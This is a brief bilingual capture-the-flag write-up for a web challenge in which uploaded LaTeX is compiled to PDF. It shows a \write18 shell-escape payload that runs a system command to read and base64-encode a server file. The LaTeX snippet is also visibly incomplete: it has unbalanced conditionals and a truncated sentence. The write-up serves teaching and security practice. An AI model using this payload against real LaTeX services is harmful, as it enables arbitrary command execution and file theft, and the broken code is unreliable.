
## TexMaker (Web, 90p)

Description: Creating and using coperate templates is sometimes really hard. Luckily,
we have a webinterace for creating PDF files. Some people doubt it's secure, but I reviewed
the whole code and did not find any flaws.


In this task we could upload latex file, which server would convert to PDF, and allow us to
see it. As it turns out, there is a latex command, which allows us to use any system command.
Hence, we could simply print out flag (base64-encoded, since latex doesn't like special
\immediate\write18{cat ../flag.php | base64 > script.tex 2>&1}
\read5 to\curline
\ifeof5 \let\next=\relax
\else \curline˜\\
\ifeof5 Couldn't read the file!%
\else \readfile \closein5

###PL version

W tym zadaniu mogliśmy wysłać plik w latexu, który strona konwertowała do pdf-a, a następnie
dawała do niego linka. Jak się okazuje, istnieje komenda latexa do wykonania dowolnego polecenia
systemowego. Korzystając z tego, wypisujemy flagę (zakodowaną base64, żeby nie zepsuć parsera):
\immediate\write18{cat ../flag.php | base64 > script.tex 2>&1}
\read5 to\curline
\ifeof5 \let\next=\relax
\else \curline˜\\
\ifeof5 Couldn't read the file!%
\else \readfile \closein5

Original writeup (https://github.com/p4-team/ctf/tree/master/2016-02-20-internetwache/web_90).